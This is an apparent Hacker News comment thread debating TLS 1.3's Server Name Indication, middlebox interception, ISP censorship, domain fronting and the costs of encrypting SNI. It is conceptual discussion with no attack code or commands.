It sounds as though you've (perhaps against your will) accepted the proxy, so in that case all bets are off anyway, a proxy can do whatever it likes, if you don't want that don't trust proxies.


> your client will automatically, in plain text, transmit the full DNS name of whatever server it wants to talk to

AIUI, it's slightly better than this, because you only actually need to send the name of some domain that the server can serve, not necessarily the one you actually want to talk to. If the domain is on Cloudfront, App Engine, Heroku, etc, that means you can choose one of a billion innocuous sites to use for SNI, before connecting to the one you actually want.

This is called 'domain fronting':

https://www.bamsoftware.com/papers/fronting/

I can't quite work out the trust algebra of this, though. You don't have any cryptographic guarantee that you're connecting to the right site. But you can be sure that you're connecting to whichever server hosts the site whose name you're taking in vain. But if that server was able to serve your site all along, because it had its private key, did you ever really have any guarantee?

Probably won't help for wikipedia, though, as they're not behind a CDN.


Wikipedia summary of domain fronting: https://en.wikipedia.org/wiki/Domain_fronting


But browsers don't do this, and don't have any channel to look up these DNS mappings.


> Under TLS 1.3 the Server Name Indication extension becomes mandatory

Is the client allowed to not send an SNI? If not, does this mean that HTTPS servers will no longer have a "default" HTTPS virtual host if accepting only TLSv1.3 connections?

If you don't get to know anything about the backend at an IP until you've essentially proven you have a shared secret (the domain name), this could be a bad time for the folks who try to scan IP address space for HTTPS sites (e.g. the DDoSers who want to de-anonymize Cloudflare-protected backends in order to attack them directly.)


The SNI extension is a MUST in the TLS 1.3 standard. Of course this is not a law of physics, it's perfectly possible to implement a client which doesn't send this extension but the standard says to do this, so implementations which reject your connection for being non-standard might exist, might even become popular. You can reject connections that lack SNI even today if you want, it's just that the most popular web server software has the "default" behaviour you described, but that's not mandatory or unavoidable.

Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next say, five years unless there's some monumental security problem that makes TLS 1.2 moot.


So if middleware can just snoop the SNI and filter (e.g. Wikipedia) on that, doesn't that negate any of the supposed privacy improvements of TLS 1.3? Other people in this thread seem to think that it provides more protection against MITM and snooping from middleware than did 1.2. How is that supposed to work?


There's a couple of things to keep in mind. First, all major browsers (and many other TLS clients too) have been using SNI for more than a decade now, so it's not so much that TLS 1.3 makes things worse, it just better reflects the implementation reality. Second, even in a hypothetical world without SNI, anyone watching the traffic would still see the IP the client is talking to. For a large percentage of web traffic, that IP address can easily be associated with exactly one domain, and for the rest - shared web hosts, things behind CDNs, etc. - you still have the response size to work with, which you can use to make a fairly good guess as to what the domain is.

Of course it's usually even simpler than that because you can just look at DNS lookups which overwhelmingly don't use transport-level encryption today.


I was told that DNS was the reason for keeping the SNI unencrypted. I.e., encrypting SNI is tricky and doesn't help if DNS reveals what you are doing anyway.

The DNS community is now trying to move to DNS over TLS. Once that is wide spread, there is hope that a future TLS version will encrypt SNI.

Note that if you do DH before sending the SNI then it requires an active attack to figure out the SNI. However that will make life very difficult for server-side proxies that try to route traffic based on SNI.


Encrypting SNI would come at a cost

TLS 1.3 provides 1RTT encryption by having clients speculate that the server is modern. The client opens by saying "OK, I assume you know how to do this key exchange and here are my parameters". If the server actually does _not_ know the flavour of key exchange proposed, it sends a retry message, explaining what it does know instead and we're immediately paying an extra round trip cost.

SNI travels in that first message from the client, but if we are to encrypt it with the DH key we can't send it until the client knows that key, which means we again pay an extra round trip.

You might think hold on, surely we can immediately start our transaction because we have the encryption keys now, so we're not paying an extra round trip. Nope, we mustn't start the transaction until we've seen the server's certificate, so we have to wait an entire extra round trip.

The best option if we want to really encrypt SNI is to have servers able to choose to go early, so you'd connect without SNI, and then after finishing DH the server could choose to either immediately send certificates (so it can't serve different sites this way) or ask for the encrypted SNI first. This would mean it's 1RTT for www.google.com and 2RTT for another-cat-blog.example because the latter is on a cheap bulk host. That's... not great.

A way forward that's resistant to attack but isn't full encryption would be use of hashing, the client specifies only a hash of the hostname, not the plain name, and the server matches this against its known list of possible names. A snooper sees the hash, and can try to guess what it means, but if they have no idea they're out of luck.

We can make the snooper's life hard either in the protocol design itself (e.g. send password-style salted & pessimised hashes, so both the server and snoopers must recalculate for each connection) or in our naming (e.g. name the members only web site zqdm-48gb.example.com, not members.example.com) but this is far less comprehensive than full encryption.


Under the assumption that DNS will move to TLS, a future TLS will have to incur this cost.

It is nice to have 1RTT, but if at the same time you are leaking SNI, people are not going to be happy.

I'm curious how this hashing would work out. My gut feeling is that some security researcher will have a nice presentation along the line of 'nice hash function you have, here's how to break it'.


Given certificate pinning, could a client just encrypt the SNI message using the pinned cert (i.e. the server's X.509 public key)? Anything that can decrypt that message is the thing we wanted to talk to. If it can't, well, a pinned-cert failure is uncommon enough to warrant an extra round-trip, even if the client wants to allow it.


There are a bunch of problems with this idea:

* It is common to pin a certificate for which you don't have the corresponding private key, and so you would not be able to decrypt the message. Examples: Pinning an intermediate from a CA you use, or their root, pinning a "backup" that you have on paper just in case but isn't live

* Pinning is a serious foot gun and a hostage risk (bad guys take over your site for one day, it seems normal but pins _their_ key, then they tell you to pay them $1M for the key or else, your users are locked out until you pay), so it is being deprecated for the public Web.

* Which key? The whole point of SNI is that we tell the remote server which site we're interested in, and then it chooses the keys and certificate accordingly. So with your approach the server must use trial-and-error to eliminate all the keys that don't work first, it barely matters what's actually inside the SNI message, if you can decrypt it then you've already found the right site...


> Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next say

Sure, most servers won't be able to take advantage of this. But if your server is using TLS only to speak to your reverse-proxy over the public Internet (e.g. if you're operating a Cloudflare-protected site where the TLS is terminated at Cloudflare and then a separate TLS connection is made from Cloudflare to your backend), you might be able to take full advantage of this as soon as your reverse-proxy's client logic supports TLSv1.3.


> SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]

At least for those that are stuck on IPv4, which is unfortunately a majority.


IPv6 without SNI won't really fix the censorship issue anyway. If you're not using a shared host with SNI The proxy can just query the host at the IP address you're attempting to access and see what it responds with, since that IP will only be serving one domain.


Well, it is not a proxy but biggest ISP of Turkey.


Active MITM remains able to sniff certificates, because the certificate is exchanged (indeed, must be exchanged) before you can authenticate the key exchange and thus lock out AMITM attackers.


Is it possible to launch active MITM attack and then establish connection like it wasn't there? The point of sniffing certificate is to block access for some websites and allow for others, located on the same IP address. Otherwise you could just block IP.


Why intercept certificate if you can block IP?


IPs are often used by many sites: it’s like telling the post office to drop mail to 1234 5th St when that’s an apartment building with hundreds of residents. If you block a major CDN you’ll take out things like Microsoft, Apple, etc. and generate a lot more publicity for your censorship program.


Because Wikipedia has many IPs and they change from time to time.

And best part is when Russians were blocking a blogger's web site based on IP he switched his IP to a bank's web site and thus the bank's IP was blocked automatically :)


Sounds strange that a bank would host its website on a shared Ip address.


They didn't.

To clarify: the blogger set his domain to point to the bank's IP address. The automated domain blocking system resolved his domain and blocked "its IP" without confirming that the IP actually belonged to the targeted site.


That's absolutely glorious.


The author states:

"The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet."

Can someone elaborate on a specific instance of this where a TLS extension lead to breakage? I don't doubt the author, quite the opposite - I'm interested in reading more about the specifics of it.


Am I the only one noticing parallels between this debate and the debate over gun regulation in the US? Concerns that firearms or privacy are fundamental rights. Concerns that regulations on inspectability of destinations or restricted access of firearms are necessary others' safety Even the distrust of the government comes up in both debates.

I have no actionable feedback from the parallels, just fascination.


Why not have the insecure or interceptable protocols as optional protocol extensions and make everyone happy? Much like with fips and how you can build openssl and other tls libs with fips mode on or off.

TLS 1.3 client libraries could then optionally support interceptable key exchange depending on who is using them. An individual can use normal OS and distro that exclude the insecure features while banks and military facilities might turn it on.

Alternatively,why the "one size fits all" approach? Why not have a "TLS-commercial". Obviously the "one size fits all" requires a comptomise by all parties resulting in a collective reduction of security.


> Why not have the insecure or interceptable protocols as optional protocol extensions and make everyone happy?

That sounds like the "draft-rehired" proposal. Here's a list of arguments against it (and similar proposals): https://github.com/sftcd/tinfoil



I have disliked the arms race against middleboxes since the beginning.


I remember when TLS was about security, not privacy. I also remember when proxies were a tool to help everyone, not just corporations who wanted to inspect all your traffic.

By ensuring that HTTPS is used everywhere, and that no other security regimes are allowed, they've killed proxies for all uses except spying on users. The end result is some of the Internet is now less private, by design.

If you think proxies are a useful tool to save bandwidth, decrease latency and reduce load, and want to stay secure, but not necessarily private, there are very obvious ways this can be done. But there are people literally fighting against this because they want privacy or nothing.

This is Internet puritanism.


Explicit proxies are no problem. There are a lot of servers behind proxies. No problem there.

There is plenty of client software that can be configured to use proxies. Also no problem there.

Where it goes wrong is transparent proxies (also called 'middleboxes') that operate without consent of the endpoints. In general, those proxies have caused so many network problems that most people involved in the IETF will happily see them die.

And the easiest way to do that is to encrypt all traffic.


There's a large number of web users - like myself - who benefited from transparent proxies. The IETF's complaints are probably almost certainly due to incompatibilities between products and erroneous modification of streams in transit, which of course should not happen. But it certainly doesn't need to die - if we killed technology for that, the whole WWW wouldn't exist.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: